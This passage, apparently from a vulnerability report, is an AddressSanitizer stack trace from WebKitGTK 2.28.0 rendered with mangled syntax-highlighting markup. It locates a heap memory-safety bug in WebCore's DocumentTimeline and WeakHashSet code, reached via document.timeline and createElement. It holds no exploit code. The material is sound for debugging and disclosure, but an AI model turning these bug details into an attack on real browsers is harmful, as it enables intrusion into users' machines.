class="hljs-number">F::</span>Ref<WebCor<span class="hljs-number">e::</span>Element, WT<span class="hljs-number">F::</span>DumbPtrTraits<WebCor<span class="hljs-number">e::</span>Element> > >&&) Source/WebCore/bindings/js/JSDOMConvertBase.h:<span class="hljs-number">202</span><br> #<span class="hljs-number">48</span> <span class="hljs-number">0</span>x7fbd037ec467 in jsDocumentPrototypeFunctionCreateElementBody DerivedSources/WebCore/JSDocument.cpp:<span class="hljs-number">5071</span><br> #<span class="hljs-number">49</span> <span class="hljs-number">0</span>x7fbd037ec467 in call<WebCor<span class="hljs-number">e::</span>jsDocumentPrototypeFunctionCreateElementBody> Source/WebCore/bindings/js/JSDOMOperation.h:<span class="hljs-number">53</span><br> #<span class="hljs-number">50</span> <span class="hljs-number">0</span>x7fbd037ec467 in WebCor<span class="hljs-number">e::</span>jsDocumentPrototypeFunctionCreateElement(JS<span class="hljs-number">C::</span>JSGlobalObject*, JS<span class="hljs-number">C::</span>CallFrame*) DerivedSources/WebCore/JSDocument.cpp:<span class="hljs-number">5076</span><br> #<span class="hljs-number">51</span> <span class="hljs-number">0</span>x7fbca<span class="hljs-number">9342177</span> (<unknown module>)<br> #<span class="hljs-number">52</span> <span class="hljs-number">0</span>x7fbcfaab3104 (/home/ubuntu/webkitgtk-<span class="hljs-number">2</span>.<span class="hljs-number">28</span>.<span class="hljs-number">0</span>/lib/libjavascriptcoregtk-<span class="hljs-number">4</span>.<span class="hljs-number">0</span>.so.<span class="hljs-number">18</span>+<span class="hljs-number">0x3112104</span>)<br> #<span class="hljs-number">53</span> <span class="hljs-number">0</span>x7fbcfaa9c161 (/home/ubuntu/webkitgtk-<span class="hljs-number">2</span>.<span class="hljs-number">28</span>.<span class="hljs-number">0</span>/lib/libjavascriptcoregtk-<span class="hljs-number">4</span>.<span class="hljs-number">0</span>.so.<span 
class="hljs-number">18</span>+<span class="hljs-number">0</span>x30fb161)<br> #<span class="hljs-number">54</span> <span class="hljs-number">0</span>x7fbcfa7666ec in JS<span class="hljs-number">C::</span>JITCo<span class="hljs-number">de::</span>execute(JS<span class="hljs-number">C::</span>VM*, JS<span class="hljs-number">C::</span>ProtoCallFrame*) Source/JavaScriptCore/jit/JITCodeInlines.h:<span class="hljs-number">38</span><br> #<span class="hljs-number">55</span> <span class="hljs-number">0</span>x7fbcfa73f66f in JS<span class="hljs-number">C::</span>Interpreter<span class="hljs-number">::</span>executeCall(JS<span class="hljs-number">C::</span>JSGlobalObject*, JS<span class="hljs-number">C::</span>JSObject*, JS<span class="hljs-number">C::</span>CallType, JS<span class="hljs-number">C::</span>CallData const&, JS<span class="hljs-number">C::</span>JSValue, JS<span class="hljs-number">C::</span>ArgList const&) Source/JavaScriptCore/interpreter/Interpreter.cpp:<span class="hljs-number">910</span><br> #<span class="hljs-number">56</span> <span class="hljs-number">0</span>x7fbcfaf7441c in JS<span class="hljs-number">C::</span>call(JS<span class="hljs-number">C::</span>JSGlobalObject*, JS<span class="hljs-number">C::</span>JSValue, JS<span class="hljs-number">C::</span>CallType, JS<span class="hljs-number">C::</span>CallData const&, JS<span class="hljs-number">C::</span>JSValue, JS<span class="hljs-number">C::</span>ArgList const&) Source/JavaScriptCore/runtime/CallData.cpp:<span class="hljs-number">59</span><br> #<span class="hljs-number">57</span> <span class="hljs-number">0</span>x7fbcfaf7459f in JS<span class="hljs-number">C::</span>call(JS<span class="hljs-number">C::</span>JSGlobalObject*, JS<span class="hljs-number">C::</span>JSValue, JS<span class="hljs-number">C::</span>CallType, JS<span class="hljs-number">C::</span>CallData const&, JS<span class="hljs-number">C::</span>JSValue, JS<span class="hljs-number">C::</span>ArgList const&, WT<span 
class="hljs-number">F::</span>NakedPtr<JS<span class="hljs-number">C::</span>Exception>&) Source/JavaScriptCore/runtime/CallData.cpp:<span class="hljs-number">66</span><br> #<span class="hljs-number">58</span> <span class="hljs-number">0</span>x7fbcfaf74a8f in JS<span class="hljs-number">C::</span>profiledCall(JS<span class="hljs-number">C::</span>JSGlobalObject*, JS<span class="hljs-number">C::</span>ProfilingReason, JS<span class="hljs-number">C::</span>JSValue, JS<span class="hljs-number">C::</span>CallType, JS<span class="hljs-number">C::</span>CallData const&, JS<span class="hljs-number">C::</span>JSValue, JS<span class="hljs-number">C::</span>ArgList const&, WT<span class="hljs-number">F::</span>NakedPtr<JS<span class="hljs-number">C::</span>Exception>&) Source/JavaScriptCore/runtime/CallData.cpp:<span class="hljs-number">87</span><br><br>previously allocated by thread T0 here:<br> #<span class="hljs-number">0</span> <span class="hljs-number">0</span>x7fbd0ae8fb40 in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.<span class="hljs-number">4</span>+<span class="hljs-number">0</span>xdeb40)<br> #<span class="hljs-number">1</span> <span class="hljs-number">0</span>x7fbcfc05f7c8 in WT<span class="hljs-number">F::</span>fastMalloc(unsigned long) Source/WTF/wtf/FastMalloc.cpp:<span class="hljs-number">201</span><br> #<span class="hljs-number">2</span> <span class="hljs-number">0</span>x7fbcfc05f7f0 in WT<span class="hljs-number">F::</span>fastZeroedMalloc(unsigned long) Source/WTF/wtf/FastMalloc.cpp:<span class="hljs-number">95</span><br> #<span class="hljs-number">3</span> <span class="hljs-number">0</span>x7fbd<span class="hljs-number">0200f953</span> in WT<span class="hljs-number">F::</span>FastMallo<span class="hljs-number">c::</span>zeroedMalloc(unsigned long) DerivedSources/ForwardingHeaders/wtf/FastMalloc.h:<span class="hljs-number">206</span><br> #<span class="hljs-number">4</span> <span class="hljs-number">0</span>x7fbd<span 
class="hljs-number">0200f953</span> in WT<span class="hljs-number">F::</span>HashTable<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >, WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >, WT<span class="hljs-number">F::</span>IdentityExtractor, WT<span class="hljs-number">F::</span>PtrHash<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > > ><span class="hljs-number">::</span>allocateTable(unsigned int) DerivedSources/ForwardingHeaders/wtf/HashTable.h:<span class="hljs-number">1210</span><br> #<span class="hljs-number">5</span> <span class="hljs-number">0</span>x7fbd<span class="hljs-number">0200f953</span> in WT<span class="hljs-number">F::</span>HashTable<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >, WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span 
class="hljs-number">F::</span>WeakPtrImpl> >, WT<span class="hljs-number">F::</span>IdentityExtractor, WT<span class="hljs-number">F::</span>PtrHash<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > > ><span class="hljs-number">::</span>rehash(unsigned int, WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >*) DerivedSources/ForwardingHeaders/wtf/HashTable.h:<span class="hljs-number">1322</span><br> #<span class="hljs-number">6</span> <span class="hljs-number">0</span>x7fbd0201070c in WT<span class="hljs-number">F::</span>HashTable<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >, WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >, WT<span class="hljs-number">F::</span>IdentityExtractor, WT<span class="hljs-number">F::</span>PtrHash<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span 
class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > > ><span class="hljs-number">::</span>expand(WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >*) DerivedSources/ForwardingHeaders/wtf/HashTable.h:<span class="hljs-number">1244</span><br> #<span class="hljs-number">7</span> <span class="hljs-number">0</span>x7fbd02cd3b60 in WT<span class="hljs-number">F::</span>HashTableAddResult<WT<span class="hljs-number">F::</span>HashTableIterator<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >, WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >, WT<span class="hljs-number">F::</span>IdentityExtractor, WT<span class="hljs-number">F::</span>PtrHash<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span 
class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > > > > WT<span class="hljs-number">F::</span>HashTable<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >, WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >, WT<span class="hljs-number">F::</span>IdentityExtractor, WT<span class="hljs-number">F::</span>PtrHash<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > > ><span class="hljs-number">::add</span><WT<span class="hljs-number">F::</span>IdentityHashTranslator<WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>PtrHash<WT<span class="hljs-number">F::</span>Ref<WT<span 
class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > > >, WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > const&, WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >(WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > const&, WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >&&) DerivedSources/ForwardingHeaders/wtf/HashTable.h:<span class="hljs-number">929</span><br> #<span class="hljs-number">8</span> <span class="hljs-number">0</span>x7fbd<span class="hljs-number">059525b1</span> in WT<span class="hljs-number">F::</span>HashTable<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >, WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >, WT<span class="hljs-number">F::</span>IdentityExtractor, WT<span class="hljs-number">F::</span>PtrHash<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>HashTraits<WT<span 
class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > > ><span class="hljs-number">::add</span>(WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >&&) DerivedSources/ForwardingHeaders/wtf/HashTable.h:<span class="hljs-number">467</span><br> #<span class="hljs-number">9</span> <span class="hljs-number">0</span>x7fbd<span class="hljs-number">059525b1</span> in WT<span class="hljs-number">F::</span>HashSet<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >, WT<span class="hljs-number">F::</span>PtrHash<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > > ><span class="hljs-number">::add</span>(WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >&&) DerivedSources/ForwardingHeaders/wtf/HashSet.h:<span class="hljs-number">241</span><br> #<span class="hljs-number">10</span> 
<span class="hljs-number">0</span>x7fbd<span class="hljs-number">059525b1</span> in WT<span class="hljs-number">F::</span>HashTableAddResult<WT<span class="hljs-number">F::</span>HashTableIterator<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >, WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> >, WT<span class="hljs-number">F::</span>IdentityExtractor, WT<span class="hljs-number">F::</span>PtrHash<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > >, WT<span class="hljs-number">F::</span>HashTraits<WT<span class="hljs-number">F::</span>Ref<WT<span class="hljs-number">F::</span>WeakPtrImpl, WT<span class="hljs-number">F::</span>DumbPtrTraits<WT<span class="hljs-number">F::</span>WeakPtrImpl> > > > > WT<span class="hljs-number">F::</span>WeakHashSet<WebCor<span class="hljs-number">e::</span>DocumentTimeline><span class="hljs-number">::add</span><WebCor<span class="hljs-number">e::</span>DocumentTimeline>(WebCor<span class="hljs-number">e::</span>DocumentTimeline const&) DerivedSources/ForwardingHeaders/wtf/WeakHashSet.h:<span class="hljs-number">103</span><br> #<span class="hljs-number">11</span> <span class="hljs-number">0</span>x7fbd<span class="hljs-number">059525b1</span> in WebCor<span class="hljs-number">e::</span>Document<span class="hljs-number">::</span>addTimeline(WebCor<span 
class="hljs-number">e::</span>DocumentTimeline&) Source/WebCore/dom/Document.cpp:<span class="hljs-number">8059</span><br> #<span class="hljs-number">12</span> <span class="hljs-number">0</span>x7fbd04fb4588 in WebCor<span class="hljs-number">e::</span>DocumentTimelin<span class="hljs-number">e::</span>DocumentTimeline(WebCor<span class="hljs-number">e::</span>Document&, WT<span class="hljs-number">F::</span>Seconds) Source/WebCore/animation/DocumentTimeline.cpp:<span class="hljs-number">70</span><br> #<span class="hljs-number">13</span> <span class="hljs-number">0</span>x7fbd04fb4be7 in WebCor<span class="hljs-number">e::</span>DocumentTimelin<span class="hljs-number">e::</span>create(WebCor<span class="hljs-number">e::</span>Document&) Source/WebCore/animation/DocumentTimeline.cpp:<span class="hljs-number">56</span><br> #<span class="hljs-number">14</span> <span class="hljs-number">0</span>x7fbd<span class="hljs-number">0590d0a4</span> in WebCor<span class="hljs-number">e::</span>Document<span class="hljs-number">::</span>timeline() Source/WebCore/dom/Document.cpp:<span class="hljs-number">8070</span><br> #<span class="hljs-number">15</span> <span class="hljs-number">0</span>x7fbd038177ae in jsDocumentTimelineGetter DerivedSources/WebCore/JSDocument.cpp:<span class="hljs-number">2296</span><br> #<span class="hljs-number">16</span> <span class="hljs-number">0</span>x7fbd038177ae in get<WebCor<span class="hljs-number">e::</span>jsDocumentTimelineGetter, (WebCor<span class="hljs-number">e::</span>CastedThisErrorBehavior)<span class="hljs-number">3</span>> Source/WebCore/bindings/js/JSDOMAttribute.h:<span class="hljs-number">69</span><br> #<span class="hljs-number">17</span> <span class="hljs-number">0</span>x7fbd038177ae in WebCor<span class="hljs-number">e::</span>jsDocumentTimeline(JS<span class="hljs-number">C::</span>JSGlobalObject*, long, JS<span class="hljs-number">C::</span>PropertyName) DerivedSources/WebCore/JSDocument.cpp:<span 
class="hljs-number">2302</span><br> #<span class="hljs-number">18</span> <span class="hljs-number">0</span>x7fbcfb5c41b1 in JS<span class="hljs-number">C::</span>PropertySlot<span class="hljs-number">::</span>customGetter(JS<span class="hljs-number">C::</span>JSGlobalObject*, JS<span class="hljs-number">C::</span>PropertyName) const Source/JavaScriptCore/runtime/PropertySlot.cpp:<span class="hljs-number">50</span><br> #<span class="hljs-number">19</span> <span class="hljs-number">0</span>x7fbcf994b40d in JS<span class="hljs-number">C::</span>PropertySlot<span class="hljs-number">::</span>getValue(JS<span class="hljs-number">C::</span>JSGlobalObject*, JS<span class="hljs-number">C::</span>PropertyName) const Source/JavaScriptCore/runtime/PropertySlot.h:<span class="hljs-number">422</span><br> #<span class="hljs-number">20</span> <span class="hljs-number">0</span>x7fbcfab2381c in JS<span class="hljs-number">C::</span>JSValu<span class="hljs-number">e::</span>get(JS<span class="hljs-number">C::</span>JSGlobalObject*, JS<span class="hljs-number">C::</span>PropertyName, JS<span class="hljs-number">C::</span>PropertySlot&) const Source/JavaScriptCore/runtime/JSCJSValueInlines.h:<span class="hljs-number">886</span><br> #<span class="hljs-number">21</span> <span class="hljs-number">0</span>x7fbcfab2381c in llint_slow_path_get_by_id Source/JavaScriptCore/llint/LLIntSlowPaths.cpp:<span class="hljs-number">763</span><br> #<span class="hljs-number">22</span> <span class="hljs-number">0</span>x7fbcfaaa4eb5 (/home/ubuntu/webkitgtk-<span class="hljs-number">2</span>.<span class="hljs-number">28</span>.<span class="hljs-number">0</span>/lib/libjavascriptcoregtk-<span class="hljs-number">4</span>.<span class="hljs-number">0</span>.so.<span class="hljs-number">18</span>+<span class="hljs-number">0</span>x3103eb5)<br> #<span class="hljs-number">23</span> <span class="hljs-number">0</span>x7fbcfaab2f87 (/home/ubuntu/webkitgtk-<span class="hljs-number">2</span>.<span 
class="hljs-number">28</span>.<span class="hljs-number">0</span>/lib/libjavascriptcoregtk-<span class="hljs-number">4</span>.<span class="hljs-number">0</span>.so.<span class="hljs-number">18</span>+<span class="hljs-number">0x3111f87</span>)<br> #<span class="hljs-number">24</span> <span class="hljs-number">0</span>x7fbcfaa9c161 (/home/ubuntu/webkitgtk-<span class="hljs-number">2</span>.<span class="hljs-number">28</span>.<span class="hljs-number">0</span>/lib/libjavascriptcoregtk-<span class="hljs-number">4</span>.<span class="hljs-number">0</span>.so.<span class="hljs-number">18</span>+<span class="hljs-number">0</span>x30fb161)<br> #<span class="hljs-number">25</span> <span class="hljs-number">0</span>x7fbcfa7666ec in JS<span class="hljs-number">C::</span>JITCo<span class="hljs-number">de::</span>execute(JS<span class="hljs-number">C::</span>VM*, JS<span class="hljs-number">C::</span>ProtoCallFrame*) Source/JavaScriptCore/jit/JITCodeInlines.h:<span class="hljs-number">38</span><br> #<span class="hljs-number">26</span> <span class="hljs-number">0</span>x7fbcfa73f66f in JS<span class="hljs-number">C::</span>Interpreter<span class="hljs-number">::</span>executeCall(JS<span class="hljs-number">C::</span>JSGlobalObject*, JS<span class="hljs-number">C::</span>JSObject*, JS<span class="hljs-number">C::</span>CallType, JS<span class="hljs-number">C::</span>CallData const&, JS<span class="hljs-number">C::</span>JSValue, JS<span class="hljs-number">C::</span>ArgList const&) Source/JavaScriptCore/interpreter/Interpreter.cpp:<span class="hljs-number">910</span><br> #<span class="hljs-number">27</span> <span class="hljs-number">0</span>x7fbcfaf7441c in JS<span class="hljs-number">C::</span>call(JS<span class="hljs-number">C::</span>JSGlobalObject*, JS<span class="hljs-number">C::</span>JSValue, JS<span class="hljs-number">C::</span>CallType, JS<span class="hljs-number">C::</span>CallData const&, JS<span class="hljs-number">C::</span>JSValue, JS<span 
class="hljs-number">C::</span>ArgList const&) Source/JavaScriptCore/runtime/CallData.cpp:<span class="hljs-number">59</span><br> #<span class="hljs-number">28</span> <span class="hljs-number">0</span>x7fbcfaf7459f in JS<span class="hljs-number">C::</span>call(JS<span class="hljs-number">C::</span>JSGlobalObject*, JS<span class="hljs-number">C::</span>JSValue, JS<span class="hljs-number">C::</span>CallType, JS<span class="hljs-number">C::</span>CallData const&, JS<span class="hljs-number">C::</span>JSValue, JS<span class="hljs-number">C::</span>ArgList const&, WT<span class="hljs-number">F::</span>NakedPtr<JS<span class="hljs-number">C::</span>Exception>&) Source/JavaScriptCore/runtime/CallData.cpp:<span class="hljs-number">66</span><br> #<span class="hljs-number">29</span> <span class="hljs-number">0</span>x7fbcfaf74a8f in JS<span class="hljs-number">C::</span>profiledCall(JS<span class="hljs-number">C::</span>JSGlobalObject*, JS<span class="hljs-number">C::</span>ProfilingReason, JS<span class="hljs-number">C::</span>JSValue, JS<span class="hljs-number">C::</span>CallType, JS<span class="hljs-number">C::</span>CallData const&, JS<span class="hljs-number">C::</span>JSValue, JS<span class="hljs-number">C::</span>ArgList const&, WT<span class="hljs-number">F::</span>NakedPtr<JS<span class="hljs-number">C::</span>Exception>&) Source/JavaScriptCore/runtime/CallData.cpp:<span class="hljs-number">87</span><br> #<span class="hljs-number">30</span> <span class="hljs-number">0</span>x7fbd<span class="hljs-number">05133b63</span> in WebCor<span class="hljs-number">e::</span>JSExecStat<span class="hljs-number">e::</span>profiledCall(JS<span class="hljs-number">C::</span>JSGlobalObject*, JS<span class="hljs-number">C::</span>ProfilingReason, JS<span class="hljs-number">C::</span>JSValue, JS<span class="hljs-number">C::</span>CallType, JS<span class="hljs-number">C::</span>CallData const&, JS<span class="hljs-number">C::</span>JSValue, JS<span 
class="hljs-number">C::</span>ArgList const&, WT<span class="hljs-number">F::</span>NakedPtr<JS<span class="hljs-number">C::</span>Exception>&) Source/WebCore/bindings/js/JSExecState.h:<span class="hljs-number">73</span><br> #<span class="hljs-number">31</span> <span class="hljs-number">0</span>x7fbd<span class="hljs-number">05133b63</span> in WebCor<span class="hljs-number">e::</span>JSEventListener<span class="hljs-number">::</span>handleEvent(WebCor<span class="hljs-number">e::</span>ScriptExecutionContext&, WebCor<span class="hljs-number">e::</span>Event&) Source/WebCore/bindings/js/JSEventListener.cpp:<span class="hljs-number">180</span><br> #<span class="hljs-number">32</span> <span class="hljs-number">0</span>x7fbd<span class="hljs-number">05a70095</span> in WebCor<span class="hljs-number">e::</span>EventTarget<span class="hljs-number">::</span>innerInvokeEventListeners(WebCor<span class="hljs-number">e::</span>Event&, WT<span class="hljs-number">F::</span>Vector<WT<span class="hljs-number">F::</span>RefPtr<WebCor<span class="hljs-number">e::</span>RegisteredEventListener, WT<span class="hljs-number">F::</span>DumbPtrTraits<WebCor<span class="hljs-number">e::</span>RegisteredEventListener> >, <span class="hljs-number">1</span>ul, WT<span class="hljs-number">F::</span>CrashOnOverflow, <span class="hljs-number">16</span>ul, WT<span class="hljs-number">F::</span>FastMalloc>, WebCor<span class="hljs-number">e::</span>EventTarget<span class="hljs-number">::</span>EventInvokePhase) Source/WebCore/dom/EventTarget.cpp:<span class="hljs-number">308</span><br> #<span class="hljs-number">33</span> <span class="hljs-number">0</span>x7fbd<span class="hljs-number">05a7a942</span> in WebCor<span class="hljs-number">e::</span>EventTarget<span class="hljs-number">::</span>fireEventListeners(WebCor<span class="hljs-number">e::</span>Event&, WebCor<span class="hljs-number">e::</span>EventTarget<span class="hljs-number">::</span>EventInvokePhase) 
Source/WebCore/dom/EventTarget.cpp:<span class="hljs-number">246</span><br> #<span class="hljs-number">34</span> <span class="hljs-number">0</span>x7fbd05b187fb in WebCor<span class="hljs-number">e::</span>No<span class="hljs-number">de::</span>handleLocalEvents(WebCor<span class="hljs-number">e::</span>Event&, WebCor<span class="hljs-number">e::</span>EventTarget<span class="hljs-number">::</span>EventInvokePhase) Source/WebCore/dom/Node.cpp:<span class="hljs-number">2363</span><br> #<span class="hljs-number">35</span> <span class="hljs-number">0</span>x7fbd05a56b86 in WebCor<span class="hljs-number">e::</span>EventContext<span class="hljs-number">::</span>handleLocalEvents(WebCor<span class="hljs-number">e::</span>Event&, WebCor<span class="hljs-number">e::</span>EventTarget<span class="hljs-number">::</span>EventInvokePhase) const Source/WebCore/dom/EventContext.cpp:<span class="hljs-number">55</span><br> #<span class="hljs-number">36</span> <span class="hljs-number">0</span>x7fbd<span class="hljs-number">05a4e232</span> in dispatchEventInDOM Source/WebCore/dom/EventDispatcher.cpp:<span class="hljs-number">100</span><br> #<span class="hljs-number">37</span> <span class="hljs-number">0</span>x7fbd05a5c35f in WebCor<span class="hljs-number">e::</span>EventDispatcher<span 